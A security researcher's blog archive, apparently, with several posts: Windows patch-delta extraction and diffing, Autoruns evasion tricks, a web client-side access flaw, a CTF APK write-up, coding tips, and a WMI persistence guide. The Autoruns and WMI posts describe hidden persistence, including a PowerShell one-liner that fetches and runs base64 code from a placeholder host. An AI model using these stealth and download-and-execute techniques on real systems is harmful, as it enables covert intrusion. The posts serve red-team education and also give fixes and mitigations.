Before I start diving into the format of deltas and applying them to files, it is worth noting that Microsoft provides (slightly outdated, but still relevant) developer documentation on the Delta Compression APIs. There are actually two completely different APIs for creating and applying patch deltas: PatchAPI and MSDELTA. For this post I will be focusing on the MSDELTA API since it is newer and soley used in new patches that are being published. Besides, if you call into the MSDELTA API and provide a PatchAPI patch file it will recognize that and apply the patch anyway by calling into mspatcha.dll.

Functions in the MSDELTA API are contained inside of msdelta.dll.

  • CreateDelta(A|W|B) - create a delta from a file (A|W) or buffer (B)
  • ApplyDelta(A|W|B) - apply a delta from a file to a file (A|W) or from a buffer (B) to a buffer (B)
  • ApplyDeltaProvidedB - apply a delta from a buffer to a provided buffer that is callee allocated (no need to call DeltaFree)
  • GetDeltaInfo(A|W|B) - get metadata about the patch and calculate the signature of a delta file (A|W) or buffer (B)
  • GetDeltaSignature(A|W|B) - calculate the signature of a delta file (A|W) or buffer (B).
  • DeltaNormalizeProvidedB - puts a delta buffer in a standard state in order to be hashed by an algorithm not supported by MSDELTA
  • DeltaFree - free a delta buffer created by CreateDeltaB or ApplyDeltaB

I'll be using ApplyDeltaB to apply multiple patch delta files to a file buffer and then DeltaFree to free the generated buffer(s). Looking more closely at GetDeltaInfo* and DeltaNormalizeProvidedB are on my TODO list, but aren't all that important for the purposes of this post.

Other interesting features of the MSDELTA API is the ablility to apply the delta to specific binary sections via file type sets. There's more research to be done behind those as well!

Delta Formats

At first glance, you'd be convinced that the files in the delta folders inside of the patch are the full binaries because of their extensions. The first clue that they are not is the size of them, as they are considerably smaller than you'd expect a full binary to be. The other is that the file format is something completely different! Opening up a few of the extracted files in a hex editor shows this quickly:

wumb0 in patches$ xxd 2020-08/patch/amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.1016_none_79ea293316ee3bad/f/ntoskrnl.exe | head
00000000: e45a 9bd5 5041 3330 6e2b 8720 fa6a d601  .Z..PA30n+. .j..
00000010: b05e 10d0 c7c4 0cc4 69bc c401 4021 00b4  .^......i...@!..
00000020: ab4f 2159 0f6a 2ab4 7848 f5df d9cd 2fb8  .O!Y.j*.xH..../.
00000030: b30b 0400 0000 0a00 0000 0000 0000 9836  ...............6
00000040: 86a9 cb02 f05b dddd dddd dddd dddd dddd  .....[..........
00000050: dd2d 4dd2 333d d143 3dd4 ddd3 0128 c6c4  .-M.3=.C=....(..
00000060: cccc cccc cccc cccc c31c 22c2 cccc 3c2c  ..........".......
00000030: 003c 12                                  .<.>

These are not PE or PNG files and one clear pattern emerges! PA30 starting at offset 4 in every file, no matter what the type is. But what are those first four bytes? In my initial attempts at working with deltas I was getting frustrated because using any of the ApplyDelta* functions from msdelta.dll resulted in errors. Reasearch on the file format (PA30) eventually led me to the patent for the technology, which is interesting if you want to take a look, but provided no answer to my issue. In a true FILDI moment I just cut off the first four bytes, since file magic is usually at the start of the file (right?) and to my surprise the delta applied! Excellent, so what is that 4 bytes? And is that format documented anywhere? After a bit of thinking about seemingly useless bytes on files I'd encountered before, a checksum came to mind, specifically the most common 4 byte checksum I could think of: CRC32! So I hopped into ipython to try it out:


In [1]: import zlib

In [2]: data = open("2020-08/patch/amd64_microsoft-windows-f..ysafety-refreshtask_31bf3856ad364e35_10.0.18362.997_none_
   ...: b453df19f80f8d5b/f/wpcmon.png", "rb").read()

In [3]: hex(zlib.crc32(data[4:]))
Out[3]: '0x1a0a0b40'

In [4]: hex(int.from_bytes(data[:4], 'little'))
Out[4]: '0x1a0a0b40'

My suspicion was confirmed! Totally a lucky guess and it isn't documented anywhere that I can find.

After going through this discovery, I thought it would make an interesting CTF challenge. So I designed a CTF challenge for the yearly RITSEC CTF. It was supposed to be called patch-tuesday but I accidentally uploaded the original .sys file with the flag in it. The challenge ended up being called patch-2sday and involved invoking the MSDELTA API to patch a file after stripping off a prepended CRC32. Greetz to layle and yuana for being the only two to solve it! You can find a write-up of the solution to the challenge on the RITSEC Github; the repo also has the script I used to create the delta, if you are interested in that.

Generating Useful Binaries Out of Deltas

Let's say that I have a Windows 10 1903 x64 machine and I want to look at the differences between ntoskrnl.exe from July to August 2020. The machine has the October 2019 patches installed currently. I am going to copy the ntoskrnl.exe binary out of C:\windows\system32 and use the MSDELTA API to apply deltas to the binary to get the versions I want.

Reverse, then Forward

The version of the kernel binary that I have is 10.0.18362.388. I will need the reverse differential for this particular version to roll it back to version 10.0.18362.1 before I start patching up. I could download and extract the October 2019 update, but that would take a long time. Recall that when patches are installed, Windows Update will place binaries and differentials in the C:\Windows\WinSxS directory. You can run some powershell to find the delta you need already on the system:

PS > Get-ChildItem -Recurse C:\windows\WinSxS\ | ? {$_.Name -eq "ntoskrnl.exe"}
    Directory:
    C:\windows\WinSxS\amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.388_none_c1e023dc45da9936

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a---l        10/4/2019   6:06 AM        9928720 ntoskrnl.exe


    Directory:
    C:\windows\WinSxS\amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.388_none_c1e023dc45da9936\f


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/30/2019   6:39 PM         479646 ntoskrnl.exe


    Directory:
    C:\windows\WinSxS\amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.388_none_c1e023dc45da9936\r


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/30/2019   6:39 PM         476929 ntoskrnl.exe

The full version as well as both the forward and reverse differentials are present. Now I have all of the files I need to perform the deltas and get the two versions of the kernel that I want to diff!

Applying a Patch Delta with the MSDELTA API

I decided to write a python program to interact with msdelta.dll and invoke the ApplyDelta family of functions. If you have never used python ctypes before then the script might seem a little strange at first, but I promise it is a very powerful tool to have in your utility belt. Among other things, ctypes can act as a Foreign Function Interface to C; it allows you to call functions inside of DLLs, create structures and unions, raw buffers, and has a number of primitive types implemented such as c_uint64, c_char_p, and Windows types like DWORD, HANDLE, and LPVOID.

If you're interested in more uses of ctypes check out my post on making efficient use of ctypes structures, though keep in mind that it is written for python 2.7 and some things may have to change from the examples to support python 3. I'd like to do an addendum post sometime that ports the code to python 3.

Below is the final patch delta applying script written for python 3 (click the filename to expand). It uses all python builtins, and you'll need to be on a Windows system to run it, as it imports msdelta.dll and uses ApplyDeltaB to apply patches. It even supports legacy PatchAPI patches (PA19).

delta_patch.py

Here's a printout of the program's usage, so you can get a feel for what it provides and how to use it.

PS > python X:\Patches\tools\delta_patch.py -h
usage: delta_patch.py [-h] (-i INPUT_FILE | -n) (-o OUTPUT_FILE | -d) [-l] patches [patches ...]

positional arguments:
  patches               Patches to apply

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT_FILE, --input-file INPUT_FILE
                        File to patch (forward or reverse)
  -n, --null            Create the output file from a null diff (null diff must be the first one specified)
  -o OUTPUT_FILE, --output-file OUTPUT_FILE
                        Destination to write patched file to
  -d, --dry-run         Don't write patch, just see if it would patchcorrectly and get the resulting hash
  -l, --legacy          Let the API use the PA19 legacy API (if required)

To generate the binaries I want I'm going to apply the reverse delta and then each forward delta, creating two output files:

PS > python X:\Patches\tools\delta_patch.py -i ntoskrnl.exe -o ntoskrnl.2020-07.exe .\r\ntoskrnl.exe X:\Patches\x64\1903\2020\2020-07\x64\os-kernel_10.0.18362.959\f\ntoskrnl.exe
Applied 2 patches successfully
Final hash: zZC/JZ+y5ZLrqTvhRVNf1/79C4ZYwXgmZ+DZBMoq8ek=
PS > python X:\Patches\tools\delta_patch.py -i ntoskrnl.exe -o ntoskrnl.2020-08.exe .\r\ntoskrnl.exe X:\Patches\x64\1903\2020\2020-08\x64\os-kernel_10.0.18362.1016\f\ntoskrnl.exe
Applied 2 patches successfully
Final hash: UZw7bE231NL2R0S4yBNT1nmDW8PQ83u9rjp91AiCrUQ=

The patches applied successfully and now I have two full binaries, one from August 2020's patchset and another from July 2020. The hashes that are generated should match up with the ones in the corresponding manifest files!

What About Null Diffs?

Before I move on to diffing the two kernel versions, I wanted to explain how to use the delta_patch tool to generate a full file out of a null (n) differential. There is a built in option for it! Use the -n flag and specify an output file (but no input file) and delta_patch will apply the delta to an empty buffer. The result is the full file!

For example:

PS > python X:\Patches\tools\delta_patch.py -n -o vmcomputeagent.exe  2020-08\patch\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.18362.329_none_e3769ae1a46d95f1\n\vmcomputeagent.exe
Applied 1 patch successfully
Final hash: B5mZQ8i4OU22UQXOaDhLHNtLNhos6exfTHlsPzTmXGo=
PS > wsl -e file vmcomputeagent.exe
vmcomputeagent.exe: PE32+ executable (GUI) x86-64, for MS Windows

As you can see from the output of file, the null differential has been expanded into a full executable. You can also apply a forward differential, but only after the null one, of course, otherwise you wouldn't have a file to patch!

Patch Diffing

There are plenty of resources available on binary diffing and comparing diffing tools, so I won't be diving into how to use them, but for completeness sake, I'm going to diff the two kernels I just created!

I am going to open both versions of ntoskrnl.exe in IDA Pro 7.5, accept the symbol download prompt, and let the auto-analysis finish. Then, I'm going to close the newer of the two versions (2020-08) and call up BinDiff to diff the new version (secondary) against the older one (primary).

Matched Functions
There are only a few changed functions between the two versions

I'm going to look at MmDuplicateMemory because changes in functions related to memory always catch my eye! Below is an overview of the combined call graph in BinDiff. Green blocks are unchanged, yellow blocks have differences, red blocks were removed by the patch, and gray blocks were added by the patch.

Overview graph
Graph overview with BinDiff in combined mode

There are many changes, but I wanted to highlight one block in particular right near the top of the function (indicated by the red arrow):

Changed block
Can you spot the important change?

It looks like the return value from the function KeWaitForSingleObject was not checked in the unpatched version and the patch added a check to make sure that the function returns a value of 0 (WAIT_OBJECT_0). In terms of judging the severity of this bug, more work needs to be done to investigate what waitable object is being passed to KeWaitForSingleObject (cs:[0x1404681D0]), if there is any way to get the wait to fail reliably, and what behavior that failure would cause. This is an exercise left up to the reader.

Wrap Up

Thanks for sticking around to the end. I hope you learned a thing or two. If you have questions, comments, concerns, complaints, or corrections please feel free to reach out to me. I'm on twitter at @jgeigerm. Also reach out if the scripts break, they shouldn't do that. I'm going to try and post more Windows related content in the future, so stay tuned. I hope to see you in SEC760 someday! I recently re-wrote the kernel exploitation day and it's been a blast to teach!

That's all for now, ~~have fun inside~~!

Autoruns Bypasses

Autoruns is a tool that is part of the Microsoft Sysinternals suite. It comes in permutations of console/GUI and 32/64 bit versions. Its main purpose is to detect programs, scripts, and other items that run either periodically or at login. It's a fantastic tool for blue teams to find persistent execution, but it is not perfect! By default, autoruns hides entries that are considered "Windows" entries (Options menu -> Hide Windows Entries). There is a checkbox to unhide them, but it introduces a lot of noise. In my preparations to red team for the Information Security Talent Search (ISTS) at RIT and the Mid-Atlantic Collegiate Cyber Defense Comptition (MACCDC) this year I found a few ways to hide myself among the Windows entries reported in Autoruns.

For some prior work done in this area check out Huntress Labs's research and Conscious Hacker's research.

[[more]]

Method 1: Copy a file

This one is as easy as copying powershell or cmd to another name and using that name instead. It looks like autoruns will flag by name on powershell and cmd as shown below:

malicious entry found in autoruns

This entry in the infamous run key is running powershell to use Net.Webclient to download and execute a string (DownloadString -> IEX).
badstuff registry entry

Clearly malicious! So now let's try copying powershell.exe to badstuff.exe:
copy \Windows\system32\WindowsPowerShell\v1.0\powershell.exe \Windows\system32\badstuff.exe

Then we need to edit the registry key to use our copied executable:

regedit copy

Now looking at autoruns it appears clean
clean autoruns

Showing windows entries reveals the entry, but this time it is not highlighted red. Autoruns doesn't know what it is, only that it is in system32 and signed by Microsoft.
autoruns with windows entries

Proposed fix: check not only the executable name, but the program description to detect cmd and powershell.

Method 2: Image File Execution Options

The Image File Execution Options (IFEO) registry key located at HKLM:\SOFTWARE\Microsoft\Windows NT\CurrrentVersion\Image File Execution Options is used to set a myriad of options such as heap options and setting a program's debugger. For this bypass to work we can pick a lesser-used executable in System32 and set its Debugger in IFEO to cmd.exe or powershell.exe. I chose print.exe for this test, but there may be better options.

print ifeo

The technique involves creating a key under the parent IFEO and adding a REG_SZ value with the executable to execute.
Then we need to edit our run key to use print.exe instead of powershell.exe. Checking back with autoruns the entry is gone!
clean autoruns

And again unhiding windows entries results in the entry being shown, but this time we have the added bonus of not appearing as powershell in the description!
autoruns with windows entries print

Proposed fix: resolve the final executable by checking the Debugger key in Image File Execution Options.

There's another technique you can also use with IFEO documented on Oddvar Moe's blog.

Wrap-up

A tool is really only as good as the algorithms it uses. Autoruns is no exception. It doesn't go deep enough to figure out what binary is actually executing or if that binary is something that it would normally flag with its original name. Always be skeptical of your tools and know they might not be perfect!

Uberconference Hidden Hangup Button

I was on an uberconference call the other day and the leader of the conference mentioned how they had the ability to disconnect anyone on the call with a "Hangup" button next to the mute and profile buttons. Looking at the interface a caller with the icons expanded looks like this:

caller interface

Now let's inspect... Going down to where the profile and mute buttons are located it looks like there's one more, hidden button available:

hangup hidden html

Removing the style="display: none;" attribute from the div causes the button to show...

hangup enabled

It's funny because it actually works. If you click it the person gets booted from the call, even if you aren't an admin/call leader. Web is hard.
Thanks for reading.

Hack Fortress 2019 - helloworld2.apk

Final Score

Another great year of Hack Fortress at Shmoocon!
I wanted to do a post on this challenge in particular becuase it was one of two 300 point challenges on the board. I always get inside my own head about these challenges but I remind myself: they are not normal CTF challenges. These challenges are meant to be solved in just a few minutes, since the board is pretty big and the length of the competition is pretty short (30 min for prelims, 45 min for finals).

I always focus on the Data Exploitation challenges because they usually have high point values and consist of android application reversing, basic binary reversing, macOS and image forensics (thanks Sarah), obscure encoding, crypto (sometimes), and hardware, among other things. It's a very diverse but fun category. I solved three challenges totalling 525 points in this category in the finals. This particular challenge was the majority of those points, but actually took the least time since I've had experience with android application reverse engineering before.

The challenge details were:

Name: HelloWorld2
Location: helloworld2.apk
Points: 300
Desc: Find the encryption key

Whenever I get an APK I do two things:

Unfortunately my version of dex2jar was out of date so I had some issues with my automated decompilation tools. I ended up downloading the newest version of dextools, running dex2jar, loading the jar into JD-GUI, and exporting the sources.
Android apps always start with MainActivity, which was in the class path fortress/hack/helloworld2. The decompiled code is below.

package fortress.hack.helloworld2;

import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.util.Base64;
import android.view.View;
import android.widget.EditText;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class MainActivity
  extends AppCompatActivity
{
  static
  {
    System.loadLibrary("native-lib");
  }

  public static String encrypt(String paramString1, String paramString2, String paramString3)
  {
    try
    {
      IvParameterSpec localIvParameterSpec = new javax/crypto/spec/IvParameterSpec;
      localIvParameterSpec.(paramString2.getBytes("UTF-8"));
      paramString2 = new javax/crypto/spec/SecretKeySpec;
      paramString2.(paramString1.getBytes("UTF-8"), "AES");
      paramString1 = Cipher.getInstance("AES/CBC/PKCS5PADDING");
      paramString1.init(1, paramString2, localIvParameterSpec);
      paramString1 = Base64.encodeToString(paramString1.doFinal(paramString3.getBytes()), 0);
      return paramString1;
    }
    catch (Exception paramString1)
    {
      paramString1.printStackTrace();
    }
    return null;
  }

  public void enceyptData(View paramView)
  {
    paramView = (EditText)findViewById(2131165238);
    ((EditText)findViewById(2131165239)).setText(encrypt(keyFromJNI(), getString(2131427370), paramView.getText().toString()));
  }

  public native String keyFromJNI();

  protected void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    setContentView(2131296284);
  }
}

We are looking for the encryption key. In the encrypt function the first paramter passed is the key. We know this because the first parameter to the init function of javax.crypto.spec.SecretKeySpec is the key as bytes. Encrypt is called from MainActivity.enceyptData (sic) and the first parameter is keyFromJNI(). The function keyFromJNI has the prototype public native String keyFromJNI(); which means that there is a native library in the application that will provide the key back to the java app.
Native libraries for an android application can be found in the lib directory of the APK. The unpacked apk shows four different architectures in the lib directory: arm64-v8a, armeabi-v7a, x86, and x86_64. I chose to look at the x86 version of libnative-lib.so, since Hopper is better at x86 than other architectures (in my opinion).
Since I have reverse engineered java native libraries before I know to look for the function name and/or class name in the function list. Pictured below is both the search and the decompiled function.

Hopper

Looks like the classic "build a string as integers" trick. I'm assuming sub_61a0 is some kind of memory allocation function, and arg0 is always the JNIEnv pointer, which contains a bunch of useful functions to convert C types into java types to return. I'm guessing the arg0+0x29c is either NewString or NewStringUTF. Moving forward I just took all of the hex bytes from the four integers that get put into the key buffer and unhexlified them.

In [26]: from binascii import unhexlify as unhex

In [27]: unhex("212b2b636f74746f47756f596563694e")
Out[27]: b'!++cottoGuoYeciN'

Looks promising, but backwards...

In [28]: unhex("212b2b636f74746f47756f596563694e")[::-1]
Out[28]: b'NiceYouGottoc++!

And there's the flag!
NiceYouGottoc++

sqlalchemy Magic

I was writing a plugin for CTFd and I was faced with an interesting problem: how the hell do I add a column (attribue) to a parent table without modifying that table (or model object)???
I was trying to assign an extra attribute to the Teams model; a one-to-many relationship between bracket and team so I could have Teams.chal_bracket and Bracket.teams, but again without modifying the Teams model.
I had actually tried overriding the Teams model and also adding a row on the fly, but neither of those worked. I ended up with the solution below: [[more]]

# secondary table for team<->bracket associations
tb = db.Table("team_bracket",
              db.Column("bracket_id", db.Integer, db.ForeignKey("bracket.id")),
              db.Column("team_id", db.Integer, db.ForeignKey("teams.id"))
              )


class Bracket(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String, index=True, unique=True)
    hidden = db.Column(db.Boolean)
    # super hacked up way to get the chal_bracket attribute on the parent
    # model class (Teams) without actually modifying it
    teams = db.relationship("Teams", backref=db.backref("chal_bracket", uselist=False),
                            secondary=tb, primaryjoin=id == tb.c.bracket_id,
                            secondaryjoin=Teams.id == tb.c.team_id)

Breaking this down:

  • The table tb defines the table team_bracket, which associates a team and a bracket by id
  • The Bracket class, which represents a database table and has an attribute teams
  • The teams attribute has a backref that allows access to the bracket of a team using the Teams.chal_bracket attribue. The attribute is back-populated by sqlalchemy internally; this means the table isn't changed, but sqlalchemy does the work for you! The uselist=False argument is used so that team.chal_bracket returns just the bracket object and not a list of length 1 with the bracket object in it.
  • The teams attribute also defines two joins: a primaryjoin that links the id of the object to the bracket id and a secondaryjoin that links the team id to the team_id of the object. This makes it so that you can get all of the teams associated with a bracket by just doing Bracket.teams and also get the bracket associated with a team by doing Teams.chal_bracket.

Normally you would have to define a relationship in the parent as follows:

class Teams(db.Model):
...
    chal_bracket_id = db.Column(db.Integer, db.ForeignKey("bracket.id"))
    chal_bracket = db.Relationship("Bracket")

But because of this hack you don't need to modify the parent model to accomplish the exact same thing.
Pretty cool.

Server Side Google Analytics

I stitched together a bunch of posts from different sites to get a working setup for server-side google analytics with unique user tracking. This allows you to have a completely static (javascript-free) site and still get useful analytics data.

server {
    # all of your other config...
        userid         on;
        userid_name    uid;
        userid_domain  <<the domain you are using this on>>;
        userid_path    /;
        userid_expires 365d;
        userid_p3p     'policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"';

        location / {
                try_files $uri $uri/;
                index index.html;
                post_action @analytics;
        }

        location @analytics {
                internal;
                set $ipaddr $remote_addr;
                resolver 8.8.8.8 ipv6=off;
                proxy_pass https://ssl.google-analytics.com/collect?v=1&tid=<<your analytics UA- tag>>&cid=$uid_got&t=pageview&dh=$host&dp=$uri&dr=$http_referer&uip=$remote_addr;
        }
}

Of course replace the <<the domain you are using this on>> and <<your analytics UA- tag>> with the appropriate data.
This will result in the server sending out a GET request with the client's info to the tracking URL for each page visit. It increases bandwidth used by your server but is a neat trick regardless.

Upgrading an Amazon EC2 Instance from Ubuntu Trusty to Xenial

I had a bad time.
I ran a do-release-upgrade on one of my Amazon EC2 instances to try and upgrade it from 14.04 (Trusty) to 16.04 (Xenial). After the update and a reboot the box refused to come back up. When I detached the drive and attached it to another to check syslog I found this:

/sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
Usage: dhclient [-4|-6] [-SNTP1dvrx] [-nw] [-p <port>] [-D LL|LLT]
             [-s server-addr] [-cf config-file] [-lf lease-file]
             [-pf pid-file] [--no-pid] [-e VAR=val]
             [-sf script-file] [interface]
Failed to bring up eth0.

Oh good, it forgot how to eth0.
I spent about four hours figuring out how to fix it:

apt update
apt -y upgrade
cat  << EOF > /etc/update-manager/release-upgrades.d/unauth.cfg
[Distro]
AllowUnauthenticated=yes
EOF
apt install -y network-manager
do-release-upgrade
apt update
apt -y upgrade
systemctl enable systemd-networkd
systemctl enable systemd-resolved
dpkg-reconfigure resolvconf
apt-get -y autoremove
rm /etc/update-manager/release-upgrades.d/unauth.cfg
reboot
  1. Make sure you are up to date first.
  2. Some packages (python3) complain that they are unauthenticated. Feel free to skip this if you want.
  3. Install the network-manager
  4. Leap of faith... do the upgrade
  5. Finish the upgrade by installing the rest of the packages.
  6. Enable the systemd network daemon and resolver daemon
  7. Reconfigure resolvconf so you can dns
  8. Get rid of the unauth.cfg file you created
  9. Reboot and pray.

Thanks to these three links for the solutions (I just put them together):
- https://askubuntu.com/a/426121
- https://askubuntu.com/a/769239
- http://willhaley.com/blog/resolvconf-dns-issue-after-ubuntu-xenial-upgrade/

Scheduling Callbacks with WMI in C++

I am going to be starting a series of posts on what I have learned on Windows pentesting and post exploitation. These posts will have a heavy focus on red teaming for competitions and cyber exercises. I am not a pentester, but I think some of the places to hide in Windows are cool so I want to write about them. These posts will include code snippets in powershell and C++. Much of this code I had to figure out how to write using the MSDN docs alone and feel that it is useful to put on the internet somewhere so others don't have to go through so much hassle to make it work.

The topic of this post is scheduling persistent callbacks with Windows Management Instrumentation (WMI).

WMI Explained (in brief)

Essentially, WMI is an interface for configuration and information gathering on Windows systems. It is installed by default on Windows ME and up, which makes it a valuable resource for sysadmins and attackers. It contains information about all aspects of the system including processes, attached devices, and (I'm not kidding) games registered with Windows (wmic /namespace:\\root\cimv2\applications\games PATH game get). There is a lot of information here which will not be covered in this post. Exploration of what more WMI has to offer is left as an exercise to the reader!

The interface consists of namespaces, classes, and instances of classes. Namespaces contain different classes and instances are instances of classes in a namespace. Think of a namespace as a database, a class as a table schema, and an instance as a row in that table. Instances can have properties and callable methods. One of the standard examples of method calling in WMI is creating a process with the WMI command line interface command wmic:

wmic process call create calc.exe

The above line will spawn calc.exe as the current user. [[more]]

Callbacks via WMI

These callbacks can be triggered based on time or based on certain system events such as process starts/stops, drive mounts/dismounts, share creation, and any other events that get triggered in WMI. I will be exploring non-timer event driven callbacks in another post. There are four WMI classes we care about for scheduling these callbacks: CommandLineEventConsumer, __IntervalTimerInstruction, __EventFilter, and __FilterToConsumerBinding.

Event Consumers

Event consumers are essentially instructions on what to do when a particular event is fired. There are a four event consumers located in the ROOT/SUBSCRIPTION namespace that can be used to respond to events:
- CommandLineEventConsumer - Run a cmd command
- ActiveScriptEventConsumer - Run javascript or VBScript text block or file
- NTEventLogEventConsumer - Log to the event log
- SMTPEventConsumer - Send an email
All four of these classes are sub-classes of __EventConsumer.
The first two are great for attackers, while the last two are great for defenders. In this post I will be using the CommandLineEventConsumer to launch callbacks in response to certain events firing.

The properties of a CommandLineEventConsumer instance are detailed below:

class CommandLineEventConsumer : __EventConsumer
{
    [key] string Name;
    [write] string ExecutablePath;
    [Template, write] string CommandLineTemplate;
    [write] boolean UseDefaultErrorMode = FALSE;
    [DEPRECATED] boolean CreateNewConsole = FALSE;
    [write] boolean CreateNewProcessGroup = FALSE;
    [write] boolean CreateSeparateWowVdm = FALSE;
    [write] boolean CreateSharedWowVdm = FALSE;
    [write] sint32 Priority = 32;
    [write] string WorkingDirectory;
    [DEPRECATED] string DesktopName;
    [Template, write] string WindowTitle;
    [write] uint32 XCoordinate;
    [write] uint32 YCoordinate;
    [write] uint32 XSize;
    [write] uint32 YSize;
    [write] uint32 XNumCharacters;
    [write] uint32 YNumCharacters;
    [write] uint32 FillAttribute;
    [write] uint32 ShowWindowCommand;
    [write] boolean ForceOnFeedback = FALSE;
    [write] boolean ForceOffFeedback = FALSE;
    [write] boolean RunInteractively = FALSE;
    [write] uint32 KillTimeout = 0;
};

The properties we care about setting are Name and CommandLineTemplate. The Name is just the name of the consumer and the CommandLineTemplate is what command to run for the callback we are going to create. Lets make it an HTTP based callback:

powershell -w hidden -ep bypass -nop -c "IEX([Text.Encoding]::Ascii.GetString([Convert]::FromBase64String(((New-Object [System.Net.WebClient).DownloadString('http://your.domain.here/callback.txt')))))";

This will download and run whatever base 64 encoded powershell code is at the URL http://your.domain.here/callback.txt.

Timer Instructions

A timer instruction fires on (obviously) a timer. There are two types of timers: interval and absolute. Interval timers run at an interval specified in milliseconds where an absolute timer is fired one time when the system time reaches the time specified in the instance.
Each of these timer types has a corresponding WMI class: __IntervalTimerInstruction and __AbsoluteTimerInstruction. Both are sub-classes of __TimerInstruction. For this example I am using the interval-based version.

The properties of an __IntervalTimerInstruction instance are detailed below:

class __IntervalTimerInstruction : __TimerInstruction
{
    [not_null: DisableOverride ToInstance ToSubClass, units("milliseconds"): DisableOverride ToInstance ToSubClass] uint32 IntervalBetweenEvents;
};

The parent class is also important and is shown below:

class __TimerInstruction : __EventGenerator
{
    [key] string TimerId;
    boolean SkipIfPassed = FALSE;
};

TimerId and IntervalBetweenEvents are the properties we care about. TimerId is the name of the timer and IntervalBetweenEvents is the number of milliseconds between event triggers. Events that are triggered at each interval are instances of the __TimerEvent class. This information will become important in the next section.

Event Filters

An event filter tells WMI what events and parameters we care about. We can use WMI Query Language (WQL) queries to select events that matter. Creating an event filter is as easy as creating an instance of the __EventFilter class, which is detailed below:

class __EventFilter : __IndicationRelated
{
    [key] string Name;
    [read: DisableOverride ToInstance ToSubClass] uint8 CreatorSID[] = {1, 1, 0, 0, 0, 0, 0, 5, 18, 0, 0, 0};
    string QueryLanguage;
    string Query;
    string EventNamespace;
    string EventAccess;
};

Name, QueryLanguage, Query, and EventNamespace are of note. Name is the name of the filter, QueryLanguage specifies what query syntax to use for the Query field. I don't know of any other setting than WQL for QueryLanguage. Query is the actual WQL (or other) query to run to check for events. To query for the timer described above the __TimerEvent class needs to be queried:

SELECT * from __TimerEvent where TimerId="YourTimerId"

Finally, the EventNamespace can be left blank for queries in the same namespace (which is the case for this example). If the query must be done in another namespace (such as root/cimv2 for many Windows events), then the namespace needs to be supplied. root/subscription would be represented as root\subscription in the Query field.

Filter to Consumer Bindings

A filter to consumer binding associates an __EventFilter instance with an __EventConsumer instance. The Filter property of an instance of this class must be set to the path to the __EventFilter created above. An example path is __EventFilter.Name="Filter1" where Filter1 is the Name of the event filter. The Consumer property is set up the same (ex. CommandLineEventConsumer.Name="CliEC1"). I have not tested it, but I think you can link consumers and filters in other namespaces by providing the full path: ROOT\\CIMV2:__EventFilter.Name="Filter1".

Now that you understand the four important classes to make this all work the code is a lot easier to parse through.

WMI Callbacks in Code

Doing it in Powershell

Matt Graeber is a good man. He has a lot of PowerShell examples of this. I will not be writing my own PowerShell for this post but I will share some of his gists that help you schedule stuff in WMI. This code helped me write the C++ that is in the next section.

This first script shows the full chain from storing code in the registry to creating the four WMI instances to schedule callbacks.

The second script is a bit simpler and shows making an event consumer that gets triggered on a volume change rather than on a timer. This is also cool to do.

Doing it in C++

This code sample was constructed from MSDN docs on the COM and the Windows WBEM interface, Matt Graeber's powershell scripts, and random other bits of knowledge scattered throughout the internet. It goes through the full chain of scheduling command line callbacks

Mitigation

The best way to stop this from happening is just to delete all event consumers, timer instructions, event filters, and filter to consumer bindings. I think the only thing that needs to be created in the subscription namespace is the event consumer since root/subscription is the only place ActiveScriptEventConsumer and CommandLineEventConsumer exist. There are no critical Windows components that require this scheduling method, so it should be okay just to delete them all:

wmic /namespace:\\root\subscription PATH __EventConsumer delete
wmic /namespace:\\root\subscription PATH __TimerInstruction delete
wmic /namespace:\\root\subscription PATH __EventFilter delete
wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding delete

These WMI callbacks also may show up in Sysinternals Autoruns and can be deleted from its interface: autoruns Based on some other tests I have run I have found that autoruns shows yellow entries for ones that it cannot find the files of as shown above. Changing the command in the CommandLineTemplate property so that it uses powershell.exe or the absolute path of powershell instead of just powershell makes the entry turn red! Even worse. Entires can be hidden from autoruns by setting the CommandLineTemplate property as follows:

cmd.exe /c powershell -w hidden -ep bypass -nop -c "your stealth command here"

Autoruns' detection of this kind of persistence is very basic and easily bypassed :)

Who uses this?

WMI is used by several actors mostly for information gathering and persistence. APT29 (a.k.a. Cozy Bear) uses this particular form of WMI persistence to run tasks at specified intervals. The backdoor was supposedly used in the DNC hacks that surrounded the 2017 presidential election. CrowdStrike has a fantastic write up on their site.
Source: Mitre ATT&CK

Experimentation and tools

WMI explorer (see references) was a huge help when testing this stuff out. I find it easiest to experiment in powershell and then finalize anything in C++ for delivery with malware that does other things too. Matt's scripts are a great starting point.

References and resources

Trend Micro paper detailing WMI scheduled callbacks. - http://la.trendmicro.com/media/misc/understanding-wmi-malware-research-paper-en.pdf
COM API for WMI - https://msdn.microsoft.com/en-us/library/aa389276(v=vs.85).aspx
Code sample for setting up WMI connection in C++ - https://msdn.microsoft.com/en-us/library/aa390423(v=vs.85).aspx
WMI Explorer - https://wmie.codeplex.com/


I hope this post has been informative for anyone curious about Windows internals and some of the nasty things you can accomplish with WMI. Check back for other posts in this series!

A Better Way to Work with Raw Data Types in Python

Working with raw data in any language can be a pain. If you are a developer there are many solutions to make it easier such as Google's Protocol Buffers. If you are a reverse engineer these methods can be too bulky especially if you are trying to quickly script an exploit (perhaps in a CTF where time is constrained). Python has always been my go-to language for exploit dev and general script writing but working with raw datatypes using just pack and unpack from the struct module is annoying and leaves much to be desired. I'm here to tell you that if you are still using pack and unpack for complex datatypes there is a better way.

For the sake of this post we will attempt to work with the raw datatypes below defined as a C structures:

typedef struct __attribute__((packed)) NestedStruct_ {
    unsigned char flags[3];
    uint8_t val1;
